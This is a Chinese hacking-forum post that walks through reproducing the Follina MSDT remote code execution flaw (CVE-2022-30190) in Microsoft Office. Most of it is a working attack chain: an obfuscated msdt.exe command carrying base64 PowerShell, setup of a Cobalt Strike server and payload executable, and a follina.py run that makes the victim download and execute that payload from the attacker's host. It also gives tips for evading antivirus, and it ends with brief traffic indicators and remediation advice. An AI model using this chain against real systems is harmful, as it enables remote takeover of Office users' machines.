找回密码
 立即注册
注册 登录
×
热搜: 活动 交友 discuz
黑客通»论坛 黑客通 系统应用 CVE-2022-30190 MSDT远程代码执行漏洞复现
查看: 89|回复: 1

CVE-2022-30190 MSDT远程代码执行漏洞复现

[复制链接]
树少

1

主题

1

帖子

3

积分

新手上路

Rank: 1

积分
3
发表于 2022-12-1 16:35:35 | 显示全部楼层 |阅读模式



0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:

Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。
0x03 漏洞概述:

Microsoft Office存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外,该漏洞在宏被禁用的情况下,仍能通过 MSDT(Microsoft Support Diagnostics Tool)功能执行代码,当恶意文件保存为 RTF 格式时,甚至无需打开文件,通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。
0x04 影响版本:

Microsoft Office 2016、Microsoft Office 2021(其他版本有待确认)
0x05 环境搭建:

Windows 10虚拟机(一定要把Windows Defender关闭)
见这篇章:
https://zhuanlan.zhihu.com/p/569802581Windows 10 宿主机
Kali虚拟机
POC1:
https://github.com/chvancooten/follina.pyPOC2:
https://github.com/JohnHammond/msdt-follina0x06 漏洞复现:

1、是否存在利用点:

CMD执行:

msdt.exe/idPCWDiagnostic/skipforce/param"IT_RebrowseForFile=?IT_LaunchMethod=ContextMenuIT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"


2、生成docx文件利用:




0x07 CS上线:
1、启动CS服务端:

chmod+xteamserver./teamserver ip key(key为密钥,客户端连接时候使用)2、CS客户端连接:







3、设置监听:

点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”





4、生成攻击exe:

点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe(注意加白,会被杀。)






5、宿主机启动8080服务:

主要目的是让被害主机从这个服务上下载CS生成的exe。
python -m http.server 8080




6、利用POC
6.1修改



6.2启动POC

python follina.py -i 192.168.18.130 -p 8000 -r 6000





6.3文件放到Windows 10虚拟机:
(注意加白,会被杀软干掉。)



6.4宿主机日志:

宿主机8080会收到一条下载成功的日志



6.5CS客户端上线:




0x08 流量分析:

(请求CS生成exe应该在VPS上的,测试环境中在攻击者这边生成比较方便)






在流量分析中,发现只会有几种请求头:

User-Agent: Microsoft Office Protocol Discovery
User-Agent: Microsoft Office Word 2014
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
伴随着的请求方式有:
HEAD 请求路径为 “/index.html”
OPTIONS 请求路径为 “/”
0x09 修复建议:

目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
回复

使用道具 举报

豪气东来

0

主题

3

帖子

5

积分

新手上路

Rank: 1

积分
5
发表于 2025-3-13 01:04:43 | 显示全部楼层
大人,此事必有蹊跷!
回复

使用道具 举报

返回列表 发 帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋| 黑客通

GMT+8, 2025-4-6 15:21 , Processed in 0.081525 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2020, LianLian.

快速回复 返回顶部 返回列表